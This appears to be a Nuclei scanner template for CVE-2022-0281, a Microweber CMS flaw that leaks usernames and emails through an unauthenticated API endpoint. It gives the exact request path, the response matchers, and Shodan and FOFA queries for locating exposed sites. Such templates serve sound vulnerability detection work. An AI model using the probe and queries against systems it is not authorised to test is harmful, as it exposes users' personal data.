56 lines
1.9 KiB
YAML
56 lines
1.9 KiB
YAML
id: CVE-2022-0281
|
|
|
|
info:
|
|
name: Microweber Information Disclosure
|
|
author: pikpikcu
|
|
severity: high
|
|
description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to the exposure of sensitive data, such as user credentials or database information.
|
|
remediation: |
|
|
Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281).
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0281
|
|
- https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6
|
|
- https://huntr.dev/bounties/315f5ac6-1b5e-4444-ad8f-802371da3505
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-0281
|
|
cwe-id: CWE-200
|
|
epss-score: 0.00415
|
|
epss-percentile: 0.73978
|
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: microweber
|
|
product: microweber
|
|
shodan-query:
|
|
- http.favicon.hash:780351152
|
|
- http.html:"microweber"
|
|
fofa-query:
|
|
- body="microweber"
|
|
- icon_hash=780351152
|
|
tags: cve,cve2022,microweber,disclosure,huntr
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/users/search_authors"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"username":'
|
|
- '"email":'
|
|
- '"display_name":'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100de30dfcc5601b9b90eb5582d0ccd01f8aa8d4a3808aba7830fe3a819bf44a795022100c924231ddafce34af8c94a0c2e7dea5c455754b4fb822ac8005bf4fe3aa0c113:922c64590222798bb761d5b6d8e72950 |